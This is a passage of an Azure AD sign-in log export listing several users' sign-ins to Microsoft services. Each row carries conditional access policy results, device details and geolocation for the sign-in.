'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",88cadf22-86a5-4f87-805f-6b28b4ce1d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,88cadf22-86a5-4f87-805f-6b28b4ce1d00,SigninLogs,Sucess,33.45851135,-82.21336365
+595,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:07.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8e1c9d61-11c4-4cd7-8fcc-21c2e20d5324,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c3a23e25-0820-4eee-81ce-29eb16821b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c3a23e25-0820-4eee-81ce-29eb16821b00,SigninLogs,Sucess,33.7984581,-84.38828278
+596,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:33.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,33b9da56-2a44-41aa-b00d-acacf2903dd6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c3a23e25-0820-4eee-81ce-29eb95851b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c3a23e25-0820-4eee-81ce-29eb95851b00,SigninLogs,Sucess,33.7984581,-84.38828278
+597,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,782596c9-de88-4339-bc09-891d630d0183,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c3a23e25-0820-4eee-81ce-29eb75861b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3a23e25-0820-4eee-81ce-29eb75861b00,SigninLogs,Sucess,33.7984581,-84.38828278
+598,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:06.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",8dc4045a-0a92-47cb-a144-866ef1d50200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8dc4045a-0a92-47cb-a144-866ef1d50200,SigninLogs,Sucess,35.01296997,-80.93171692
+599,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:31.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e006eaf-bb79-4425-bf10-da8a9a7b9452,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8ad00b2e-7523-45f8-a6db-5c47776b1b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ad00b2e-7523-45f8-a6db-5c47776b1b00,SigninLogs,Sucess,33.7984581,-84.38828278
+600,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:38.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,097c6a3b-87f5-489b-9a5c-049320f7a2ac,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",0fc515f1-f001-4d66-8b48-172bf58d0100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,0fc515f1-f001-4d66-8b48-172bf58d0100,SigninLogs,Sucess,32.32146072,34.85319901
+601,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:49.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b0beea6f-a5a2-4c41-a3a2-f4860f9084e9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4130ca1d-0d16-4aad-a433-406312591c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,4130ca1d-0d16-4aad-a433-406312591c00,SigninLogs,Sucess,33.7984581,-84.38828278
+602,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:46.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8d88539c-7f16-4fed-a521-efcf92d35a44,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, 